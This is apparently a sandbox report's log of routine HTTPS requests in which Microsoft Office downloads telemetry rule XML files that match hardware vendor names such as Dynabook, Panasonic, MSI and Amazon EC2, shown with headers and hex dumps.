                                                2024-10-29 23:22:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.2.45809613.107.246.604438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:54 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:54 GMT
                                                Content-Type: text/xml
                                                Content-Length: 423
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                ETag: "0x8DC582BB7564CE8"
                                                x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232254Z-15b8d89586fst84kttks1s2css00000000v000000000c2bp
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:54 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.45809413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:54 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:54 GMT
                                                Content-Type: text/xml
                                                Content-Length: 427
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                ETag: "0x8DC582BA909FA21"
                                                x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232254Z-16849878b785dznd7xpawq9gcn00000008qg000000000ads
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:54 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.45809513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:54 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:54 GMT
                                                Content-Type: text/xml
                                                Content-Length: 486
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                ETag: "0x8DC582B92FCB436"
                                                x-ms-request-id: 01fc617d-601e-000d-05a4-262618000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232254Z-16849878b78bjkl8dpep89pbgg000000060g000000000pr1
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:54 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.45809713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:54 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:54 GMT
                                                Content-Type: text/xml
                                                Content-Length: 478
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                ETag: "0x8DC582B9B233827"
                                                x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232254Z-15b8d89586fvpb59307bn2rcac000000029g00000000cz1a
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:54 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.45809813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:54 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:54 GMT
                                                Content-Type: text/xml
                                                Content-Length: 404
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                ETag: "0x8DC582B95C61A3C"
                                                x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232254Z-16849878b78qwx7pmw9x5fub1c00000005d00000000075ys
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:54 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.45809913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:55 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:55 GMT
                                                Content-Type: text/xml
                                                Content-Length: 468
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                ETag: "0x8DC582BB046B576"
                                                x-ms-request-id: 7ae13fc9-101e-005a-3933-26882b000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-17c5cb586f6b6kj91vqtm6kxaw00000005u000000000m23e
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:55 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.45810013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:54 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:55 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:55 GMT
                                                Content-Type: text/xml
                                                Content-Length: 400
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                ETag: "0x8DC582BB2D62837"
                                                x-ms-request-id: e7cc90bd-401e-0029-032a-279b43000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-15b8d89586ff5l62aha9080wv000000008f000000000ep7s
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:55 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.45810113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:55 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:55 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:55 GMT
                                                Content-Type: text/xml
                                                Content-Length: 479
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                ETag: "0x8DC582BB7D702D0"
                                                x-ms-request-id: de733a63-101e-00a2-1415-269f2e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-r197bdfb6b42rt68rzg9338g1g00000008c000000000pghr
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:55 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.45810213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:55 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:55 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:55 GMT
                                                Content-Type: text/xml
                                                Content-Length: 425
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                ETag: "0x8DC582BBA25094F"
                                                x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-16849878b78wc6ln1zsrz6q9w800000006t000000000vyx4
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:55 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.45810313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:55 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:55 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:55 GMT
                                                Content-Type: text/xml
                                                Content-Length: 475
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                ETag: "0x8DC582BB2BE84FD"
                                                x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-16849878b78j7llf5vkyvvcehs00000008cg000000001hm5
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:55 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.45810413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:55 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:55 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:55 GMT
                                                Content-Type: text/xml
                                                Content-Length: 448
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                ETag: "0x8DC582BB389F49B"
                                                x-ms-request-id: 84cbfce0-201e-0071-26f6-26ff15000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232255Z-17c5cb586f6mhqqby1dwph2kzs00000002e000000000ev2n
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
